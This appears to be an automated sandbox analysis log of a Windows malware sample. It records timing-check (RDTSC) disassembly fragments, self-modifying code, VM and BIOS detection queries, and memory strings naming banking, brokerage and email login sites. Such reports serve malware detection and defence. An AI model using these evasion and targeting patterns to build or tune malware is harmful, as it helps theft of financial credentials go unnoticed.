              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080325 second address: 508032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 508032B second address: 5080331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080331 second address: 5080335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080335 second address: 5080339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080339 second address: 508037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b call 00007FCD7C4F0DA2h 0x00000010 movzx esi, bx 0x00000013 pop edx 0x00000014 mov ecx, 5A27F3D3h 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FCD7C4F0DA5h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 508037A second address: 508038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB0Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50803C2 second address: 50803C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50803C8 second address: 50803CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50803CC second address: 50803EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7C4F0D9Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A05FB second address: 50A0601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0601 second address: 50A0605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0605 second address: 50A066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FCD7D2AFB16h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov eax, 4267114Dh 0x00000019 push ecx 0x0000001a mov al, bh 0x0000001c pop ecx 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 movzx ecx, dx 0x00000023 mov al, dl 0x00000025 popad 0x00000026 mov dword ptr [esp], ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FCD7D2AFB17h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A066A second address: 50A0670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0670 second address: 50A0674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0674 second address: 50A068B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A068B second address: 50A068F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A068F second address: 50A06E2 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, BCC3h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FCD7C4F0DA9h 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 call 00007FCD7C4F0D9Ch 0x00000018 mov dl, cl 0x0000001a pop ebx 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp-04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FCD7C4F0DA5h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A06E2 second address: 50A0727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 jmp 00007FCD7D2AFB18h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jmp 00007FCD7D2AFB10h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FCD7D2AFB0Ch 0x0000001d push esi 0x0000001e pop edx 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0727 second address: 50A0797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCD7C4F0D9Dh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FCD7C4F0DA1h 0x0000000f jmp 00007FCD7C4F0D9Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FCD7C4F0D9Bh 0x00000020 xor eax, 224EE1FEh 0x00000026 jmp 00007FCD7C4F0DA9h 0x0000002b popfd 0x0000002c popad 0x0000002d push dword ptr [ebp+08h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 movsx edi, ax 0x00000036 mov esi, 6783385Bh 0x0000003b popad 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A07EF second address: 50A07F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A07F5 second address: 50A07F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A07F9 second address: 50A07FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50901D3 second address: 50901D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50901D8 second address: 5090268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FCD7D2AFB15h 0x0000000a sbb si, 9256h 0x0000000f jmp 00007FCD7D2AFB11h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FCD7D2AFB13h 0x00000022 add esi, 3846C38Eh 0x00000028 jmp 00007FCD7D2AFB19h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FCD7D2AFB10h 0x00000034 or esi, 4B9F0608h 0x0000003a jmp 00007FCD7D2AFB0Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090268 second address: 5090306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, di 0x0000000e pushfd 0x0000000f jmp 00007FCD7C4F0DA3h 0x00000014 jmp 00007FCD7C4F0DA3h 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FCD7C4F0D9Bh 0x00000025 sbb si, 590Eh 0x0000002a jmp 00007FCD7C4F0DA9h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007FCD7C4F0DA0h 0x00000036 or eax, 135FAF88h 0x0000003c jmp 00007FCD7C4F0D9Bh 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090306 second address: 5090379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCD7D2AFB0Fh 0x00000008 movzx ecx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bx, E494h 0x00000015 mov di, B600h 0x00000019 popad 0x0000001a sub esp, 2Ch 0x0000001d jmp 00007FCD7D2AFB0Fh 0x00000022 xchg eax, ebx 0x00000023 jmp 00007FCD7D2AFB16h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FCD7D2AFB0Ch 0x00000032 or ecx, 799766A8h 0x00000038 jmp 00007FCD7D2AFB0Bh 0x0000003d popfd 0x0000003e push ecx 0x0000003f pop edx 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090379 second address: 509039E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCD7C4F0DA8h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 509039E second address: 50903B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB0Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090436 second address: 509048E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b jmp 00007FCD7C4F0DA7h 0x00000010 inc ebx 0x00000011 jmp 00007FCD7C4F0DA6h 0x00000016 test al, al 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edx 0x0000001c pop eax 0x0000001d mov si, dx 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 509048E second address: 5090494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090494 second address: 5090498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 509052E second address: 5090534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090534 second address: 5090538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090538 second address: 50905D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FCD7D2AFB16h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FCD7D2AFB11h 0x00000019 sub eax, 75DE7356h 0x0000001f jmp 00007FCD7D2AFB11h 0x00000024 popfd 0x00000025 call 00007FCD7D2AFB10h 0x0000002a call 00007FCD7D2AFB12h 0x0000002f pop esi 0x00000030 pop ebx 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov cx, bx 0x00000039 jmp 00007FCD7D2AFB0Fh 0x0000003e popad 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090670 second address: 5090676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090676 second address: 50906B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCDEDC7D923h 0x0000000e jmp 00007FCD7D2AFB0Eh 0x00000013 mov ebx, dword ptr [ebp+08h] 0x00000016 jmp 00007FCD7D2AFB10h 0x0000001b lea eax, dword ptr [ebp-2Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edx, 67317830h 0x00000026 mov dh, E7h 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50906B3 second address: 50906F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FCD7C4F0DA4h 0x00000011 push eax 0x00000012 jmp 00007FCD7C4F0D9Bh 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 movsx edi, cx 0x0000001c popad 0x0000001d nop 0x0000001e jmp 00007FCD7C4F0D9Ah 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50906F7 second address: 50906FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50906FB second address: 50906FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50906FF second address: 5090705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090705 second address: 5090747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FCD7C4F0DA3h 0x00000014 sbb ecx, 24E3F2FEh 0x0000001a jmp 00007FCD7C4F0DA9h 0x0000001f popfd 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090747 second address: 50907B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, B49Dh 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FCD7D2AFB15h 0x00000013 sub eax, 72A1A7E6h 0x00000019 jmp 00007FCD7D2AFB11h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FCD7D2AFB11h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FCD7D2AFB18h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50907B2 second address: 50907B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50907E8 second address: 5090805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090805 second address: 5090824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 616DC33Eh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCD7C4F0DA0h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090824 second address: 509001E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FCDEDC7D928h 0x0000000f xor eax, eax 0x00000011 jmp 00007FCD7D28923Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e xor ebx, ebx 0x00000020 cmp eax, 00000000h 0x00000023 je 00007FCD7D2AFC63h 0x00000029 call 00007FCD81E2CF8Dh 0x0000002e mov edi, edi 0x00000030 jmp 00007FCD7D2AFB15h 0x00000035 xchg eax, ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 509001E second address: 5090022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090022 second address: 5090028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090028 second address: 50900CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FCD7C4F0DA1h 0x00000011 adc ch, FFFFFFE6h 0x00000014 jmp 00007FCD7C4F0DA1h 0x00000019 popfd 0x0000001a mov edi, esi 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FCD7C4F0DA8h 0x00000025 and ecx, 5CEBE4B8h 0x0000002b jmp 00007FCD7C4F0D9Bh 0x00000030 popfd 0x00000031 jmp 00007FCD7C4F0DA8h 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 pushad 0x0000003a jmp 00007FCD7C4F0D9Eh 0x0000003f mov dx, si 0x00000042 popad 0x00000043 xchg eax, ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50900CC second address: 50900D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50900D0 second address: 50900D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50900D4 second address: 50900DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 509018D second address: 5090193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090193 second address: 5090197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090197 second address: 509019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 509019B second address: 50901BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCD7D2AFB15h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090D0B second address: 5090D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090D11 second address: 5090DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ebx, 05A8A702h 0x00000011 pushfd 0x00000012 jmp 00007FCD7D2AFB13h 0x00000017 sub al, FFFFFFFEh 0x0000001a jmp 00007FCD7D2AFB19h 0x0000001f popfd 0x00000020 popad 0x00000021 movzx esi, di 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007FCD7D2AFB13h 0x0000002b mov ebp, esp 0x0000002d jmp 00007FCD7D2AFB16h 0x00000032 cmp dword ptr [75AB459Ch], 05h 0x00000039 jmp 00007FCD7D2AFB10h 0x0000003e je 00007FCDEDC6D761h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FCD7D2AFB0Ah 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5090DB8 second address: 5090DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A08F8 second address: 50A08FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A08FD second address: 50A0903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0AE9 second address: 50A0B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7D2AFB0Ah 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50A0B0E second address: 50A0B1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSpecial instruction interceptor: First address: 53782E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSpecial instruction interceptor: First address: 6CEA35 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSpecial instruction interceptor: First address: 760EE8 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeCode function: 0_3_0125C753 sldt word ptr [eax]0_3_0125C753
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe TID: 5884Thread sleep time: -32016s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe TID: 2184Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe TID: 6820Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: zhQFKte2vX.exe, 00000000.00000002.1750925623.00000000006B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: zhQFKte2vX.exe, 00000000.00000002.1751540442.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPK
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
